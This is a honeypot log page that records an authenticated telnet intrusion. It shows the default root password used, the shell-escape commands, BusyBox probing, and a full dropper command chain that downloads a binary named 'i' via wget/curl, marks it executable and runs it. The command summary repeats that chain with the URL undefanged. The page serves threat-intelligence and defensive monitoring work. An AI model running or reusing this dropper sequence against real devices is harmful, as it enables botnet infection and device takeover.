HoneyMire HubAttack #291773 telnet
Source
182.113.224.78Target port23
Authenticatedyes
Commands11
Duration4.3s
Session recording
Transcript
root
12341234
start
enable
config terminal
system
linuxshell
su
shell
sh
>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;/bin/busybox echo -e '\x47\x41\x43\x52\x43\x57'
/bin/busybox wget;/bin/busybox echo -ne '\x47\x41\x43\x52\x43\x57'
>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget hxxp://192[.]168[.]1[.]1:8088/i ||curl -O hxxp://192[.]168[.]1[.]1:8088/i ||/bin/busybox wget hxxp://192[.]168[.]1[.]1:8088/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '\x4e\x48\x55\x4b\x47\x42\x53\x56'
Credentials
Username: root
Password: 12341234
Geolocation hub-resolved
🇨🇳China · Henan · Zhengzhou
Behavioral classification
🦠
Matched signals:
- wget/curl download
- chmod/exec chain
- BusyBox probing
Command summary
start enable config terminal system linuxshell su shell sh >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;/bin/busybox echo -e '\x47\x41\x43\x52\x43\x57' /bin/busybox wget;/bin/busybox echo -ne '\x47\x41\x43\x52\x43\x57' >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://192.168.1.1:8088/i ||curl -O http://192.168.1.1:8088/i ||/bin/busybox wget http://192.168.1.1:8088/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '\x4e\x48\x55\x4b\x47\x42\x53\x56'
Reported to threat intel
AlienVault OTX ✓
HoneyMire Hub · open feed: / · API: /api · docs: /docs · blocklists: /blocklists · about: /about · firmware: github.com/HoneyMire/HoneyMire